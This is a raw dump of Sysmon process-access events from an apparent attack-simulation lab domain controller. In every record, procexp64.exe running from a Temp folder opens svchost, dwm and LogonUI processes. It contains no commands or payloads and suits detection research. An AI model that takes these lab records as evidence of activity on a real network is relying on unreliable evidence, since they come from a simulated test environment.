15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789629Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789628Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789627Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789626Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789625Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789624Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789623Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789622Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789621Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789620Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789619Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789618Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789617Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789616Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789615Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789614Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789613Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789612Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789611Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789610Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789609Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789608Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+3ad5|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+40b1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+cdf4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c8f1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2ed6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2772|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789607Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:36.329{732C744F-2A79-6010-97A1-00000000A301}70402176C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c459|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+c50b|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2f56|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+2b0a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+25cd|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+11b6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\CorperfmonExt.dll+bf34|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789606Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 